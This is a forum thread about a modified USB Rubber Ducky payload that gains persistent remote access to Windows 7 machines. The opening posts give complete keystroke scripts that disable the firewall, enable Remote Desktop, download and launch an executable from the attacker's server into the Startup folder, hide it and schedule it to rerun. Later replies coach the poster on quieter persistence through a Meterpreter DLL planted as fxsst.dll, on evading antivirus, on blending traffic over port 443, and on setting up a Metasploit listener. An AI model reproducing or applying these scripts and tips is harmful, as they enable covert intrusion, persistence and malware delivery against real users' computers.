TeCHemically Posted August 30, 2013 Share Posted August 30, 2013 (edited) This is a simple modification to the powershell reverse payload w/UAC for Win7 in simple-ducky to make it persistent. All credit goes to Skysploit for this payload! I added the quicker UAC bypass method and edited the location that the EXE is placed for persistence. Verified system privileges after log off and reboots! :D ****************************************************************************************************************************** DELAY 5000ESCAPEDELAY 400CONTROL ESCAPEDELAY 400STRING cmdDELAY 400MENUDELAY 400STRING aDELAY 700ALT YDELAY 800ENTERSTRING netsh firewall set opmode disableENTERDELAY 300STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /fENTERDELAY 300STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /fENTERDELAY 300STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<server_name>/winmgmt.txt','%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winmgmt.exe'); Start-Process "'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe'"ENTERSTRING exitENTER ****************************************************************************************************************************** You MUST use simple-ducky by Skysploit to generate this payload and place the winmgmt.txt file in your webserver location. After you have gone through creating the payload simply delete the created "inject.bin" file and open the "payload.txt" file for editing. Delete all text and paste in the payload code above. Then in terminal type the following 2 commands: cd /usr/share/ducky/encoder (for Kali, if using a different OS then cd to the directory your "encoder.jar" file is in) java -jar encoder.jar -i payload.txt -o inject.bin (now place the "inject.bin" file on your ducky and use as you normally would) Edited August 30, 2013 by TeCHemically Quote Link to comment Share on other sites More sharing options...
TeCHemically Posted September 4, 2013 Author Share Posted September 4, 2013 (edited) Ok, I added a bit more to make persistence truly persistent. This now changes the attributes of the winmgmt.exe file to a hidden system file so it is not ordinarily visible. It also creates a scheduled task to run this every 2 hours in case connection is lost. If this task has already been run in the past it will replace the scheduled task with the name "Management". DELAY 5000ESCAPEDELAY 400CONTROL ESCAPEDELAY 400STRING cmdDELAY 400MENUDELAY 400STRING aDELAY 700ALT YDELAY 800ENTERSTRING netsh firewall set opmode disableENTERDELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /fENTERDELAY 300STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /fENTERDELAY 300STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<server_name>/winmgmt.txt','%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winmgmt.exe'); Start-Process "'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe'"ENTERDELAY 300STRING attrib +H +S "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe"ENTERDELAY 300STRING schtasks /create /tn Management /tr "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe" /sc hourly /mo 2ENTERDELAY 300STRING yENTERSTRING exitENTER Edited September 4, 2013 by TeCHemically Quote Link to comment Share on other sites More sharing options...
Forgiven Posted September 26, 2013 Share Posted September 26, 2013 Does your version minimize the terminal upon execution and then close the terminal when it's done? Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted September 26, 2013 Share Posted September 26, 2013 This is great, but it would be wise to keep in mind that this is a very LOUD form of persistence. If you're running this on a network, then you need to be aware of any network admins that may be watching outgoing connections or just block all inbound rdp connections at the firewall level. Quote Link to comment Share on other sites More sharing options...
TeCHemically Posted September 27, 2013 Author Share Posted September 27, 2013 This is great, but it would be wise to keep in mind that this is a very LOUD form of persistence. If you're running this on a network, then you need to be aware of any network admins that may be watching outgoing connections or just block all inbound rdp connections at the firewall level. Thanks for the feedback! :) Are there any other ways for a persistent method that is quieter? How could one go about dropping a persistent reverse shell without the resulting connetion being so noticable? I try to make sure my listener is on a common port so it can get through the network firewall and it is working on the corporate network I have available for testing currently. Any guidance is appreciated, thakns again! Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted September 27, 2013 Share Posted September 27, 2013 Well, to start, tunnelling anything over SSL is a great start. Have a look into Meterpreter in metasploit. The 64-bit https Meterpreter even as a binary will pretty much never being detected by an AV. As far as persistence goes, the startup folder is one way, but is usually picked up by AV. Or put Meterpreter into a dll file and call it "fxsst.dll" and through it into C:\Windows. Windows automatically tries to load this dll on startup as part of the "Windows Picture and Fax" service. Quote Link to comment Share on other sites More sharing options...
TeCHemically Posted September 30, 2013 Author Share Posted September 30, 2013 Well, to start, tunnelling anything over SSL is a great start. Have a look into Meterpreter in metasploit. The 64-bit https Meterpreter even as a binary will pretty much never being detected by an AV. As far as persistence goes, the startup folder is one way, but is usually picked up by AV. Or put Meterpreter into a dll file and call it "fxsst.dll" and through it into C:\Windows. Windows automatically tries to load this dll on startup as part of the "Windows Picture and Fax" service. Thanks for the help! :) Can the 64bit https meterpreter shell run on a 32 bit machine? Also, I generated the above mentioned dll via msfconsole but the command I used just allowed me to specify https. Is this created 64 bit by default or is there a part of the command I missed that will create the 64 bit shell? Thanks again, this is a great method! Quote Link to comment Share on other sites More sharing options...
TeCHemically Posted September 30, 2013 Author Share Posted September 30, 2013 Does your version minimize the terminal upon execution and then close the terminal when it's done? No, but that section could be easily added to the top. Good idea :) Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted October 1, 2013 Share Posted October 1, 2013 You can't run a 64-Bit executable on a 32-Bit machine, but you can do it the other way. (x86 Meterpreter works on x86 and x64 architectures, but x86 detection rate is A LOT higher than 64-Bit) The x86 Meterpreter reverse http sis here: payload/windows/meterpreter/reverse_https (The one I expect you used) The x64 one is here payload/windows/x64/meterpreter/reverse_https Also, try and use msfvenom for generating payloads, it's a combination of msfpayload and msfencode. Quote Link to comment Share on other sites More sharing options...
TeCHemically Posted October 1, 2013 Author Share Posted October 1, 2013 You can't run a 64-Bit executable on a 32-Bit machine, but you can do it the other way. (x86 Meterpreter works on x86 and x64 architectures, but x86 detection rate is A LOT higher than 64-Bit) The x86 Meterpreter reverse http sis here: payload/windows/meterpreter/reverse_https (The one I expect you used) The x64 one is here payload/windows/x64/meterpreter/reverse_https Also, try and use msfvenom for generating payloads, it's a combination of msfpayload and msfencode. You are quite right about everything you said. Thank you for your help; you have been a HUGE blessing! :D Quote Link to comment Share on other sites More sharing options...
TeCHemically Posted October 1, 2013 Author Share Posted October 1, 2013 So to start the handler would I use the following: use exploit/multi/handlerset LHOST 0.0.0.0set LPORT 443set PAYLOAD windows/windows/x64/meterpreter/reverse_httpsset ExitOnSession falseexploit -j Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted October 1, 2013 Share Posted October 1, 2013 Correct, except only one windows on the 4th line. set PAYLOAD windows/x64/meterpreter/reverse_https Keep in mind, that if you're in Linux and not root, you cannot bind to port 443. Just because you use reverse_https, doesn't mean you have to use 443. You can still use any port you like. (Although outward connections over 443 are a lot less suspicious - best to pick something that will blend in with the other network traffic (at least as long as ports are concerned)). Quote Link to comment Share on other sites More sharing options...
TeCHemically Posted October 2, 2013 Author Share Posted October 2, 2013 Correct, except only one windows on the 4th line. set PAYLOAD windows/x64/meterpreter/reverse_https Keep in mind, that if you're in Linux and not root, you cannot bind to port 443. Just because you use reverse_https, doesn't mean you have to use 443. You can still use any port you like. (Although outward connections over 443 are a lot less suspicious - best to pick something that will blend in with the other network traffic (at least as long as ports are concerned)). Great, thanks so much! :D Quote Link to comment Share on other sites More sharing options...
TeCHemically Posted October 2, 2013 Author Share Posted October 2, 2013 You are quite right about everything you said. Thank you for your help; you have been a HUGE blessing! :D I am having issues with msfvenom though. Using msfpayload and piping into msfencode worked to create the aforementioned dll but I don't see the options I need in the help of msfvenom. Quote Link to comment Share on other sites More sharing options...
skysploit Posted October 3, 2013 Share Posted October 3, 2013 Try modifying the payload and use dbd. DBD uses an SSL connection and is pretty darn good at bypassing AV without having to obfuscate at all. Not only that the size of the payload itself is tiny... I am currently working on a new version of the simple-ducky and it should be ready in the next couple of weeks. Great job TeCHemically! ~skysploit Quote Link to comment Share on other sites More sharing options...
TeCHemically Posted October 3, 2013 Author Share Posted October 3, 2013 Try modifying the payload and use dbd. DBD uses an SSL connection and is pretty darn good at bypassing AV without having to obfuscate at all. Not only that the size of the payload itself is tiny... I am currently working on a new version of the simple-ducky and it should be ready in the next couple of weeks. Great job TeCHemically! ~skysploit Beautiful, great work man! I just watched your vid. You have yourself another subscriber. Quote Link to comment Share on other sites More sharing options...
TeCHemically Posted October 3, 2013 Author Share Posted October 3, 2013 Try modifying the payload and use dbd. DBD uses an SSL connection and is pretty darn good at bypassing AV without having to obfuscate at all. Not only that the size of the payload itself is tiny... I am currently working on a new version of the simple-ducky and it should be ready in the next couple of weeks. Great job TeCHemically! ~skysploit So, I have to ask. Since you have "I remember" playing on that vid. Do you recognize my avatar? Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted October 3, 2013 Share Posted October 3, 2013 If msfvenom isn't working for you, then piping msfpayload into msfencode is still fine. It's what everyone did before msfvenom was released. Quote Link to comment Share on other sites More sharing options...
TeCHemically Posted October 4, 2013 Author Share Posted October 4, 2013 If msfvenom isn't working for you, then piping msfpayload into msfencode is still fine. It's what everyone did before msfvenom was released.I used msfvenom and it gave me the output of my custom shellcode. How difficult is it to implement that into a custom exe/ exe template that I can use for AV evasion? I have a thread on this started under security if you could shed some light that would be amazing, thanks for all your help! :) Quote Link to comment Share on other sites More sharing options...
TeCHemically Posted October 4, 2013 Author Share Posted October 4, 2013 (edited) Correct, except only one windows on the 4th line. set PAYLOAD windows/x64/meterpreter/reverse_https Keep in mind, that if you're in Linux and not root, you cannot bind to port 443. Just because you use reverse_https, doesn't mean you have to use 443. You can still use any port you like. (Although outward connections over 443 are a lot less suspicious - best to pick something that will blend in with the other network traffic (at least as long as ports are concerned)). I started the 32 bit listener and created the fxsst.dll with a 32bit reverse_https payload. When it runs I get the following on my listening machine: Starting the payload handler... [*] <IP address>:5465 Request received for /JuQL... [*] <IP address>:5465 Staging connection for target /JuQL received... [*] Patched user-agent at offset 657384... [*] Patched transport at offset 657044... [*] Patched URL at offset 657112... [*] Patched Expiration Timeout at offset 657868... [*] Patched Communication Timeout at offset 657984... [*] Meterpreter session 1 opened (<IP address>:443 -> <IP address>:5465) at 2013-10-04 13:47:46 -0500 [-] Failed to load extension: No response was received to the core_loadlib request. Edited October 4, 2013 by TeCHemically Quote Link to comment Share on other sites More sharing options...
TeCHemically Posted October 4, 2013 Author Share Posted October 4, 2013 Tried it again and I get the following. It is acting like the shell is there but I cannot interact at all. In fact the shell is acting like it is on the perimeter not the host behind the public IP. I usually see the public IP then the internal host when I use reverse_tcp. In this method I get the shell functioning and on the internal client PC. Does the reverse_https payload require something else? Is it not pulling down the stage? Does this payload behave differently than reverse_tcp? exploit(handler) > exploit -j [*] Exploit running as background job. [*] Starting the payload handler... [*] <Public IP address>:60476 Request received for /JuQL... [*] <Public IP address>:60476 Staging connection for target /JuQL received... [*] Patched user-agent at offset 657384... [*] Patched transport at offset 657044... [*] Patched URL at offset 657112... [*] Patched Expiration Timeout at offset 657868... [*] Patched Communication Timeout at offset 657984... [*] Meterpreter session 1 opened (<IP address>:443 -> <Public IP address>:60476) at 2013-10-04 17:21:11 -0500 Quote Link to comment Share on other sites More sharing options...
TeCHemically Posted October 5, 2013 Author Share Posted October 5, 2013 Try modifying the payload and use dbd. DBD uses an SSL connection and is pretty darn good at bypassing AV without having to obfuscate at all. Not only that the size of the payload itself is tiny... I am currently working on a new version of the simple-ducky and it should be ready in the next couple of weeks. Great job TeCHemically! ~skysploit WOW, just...WOW man...the new simple-ducky is freaking BEAUTIFUL!!! Amazing work Skysploit; a true inspiration! Way to go and THANK YOU! :D :D Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.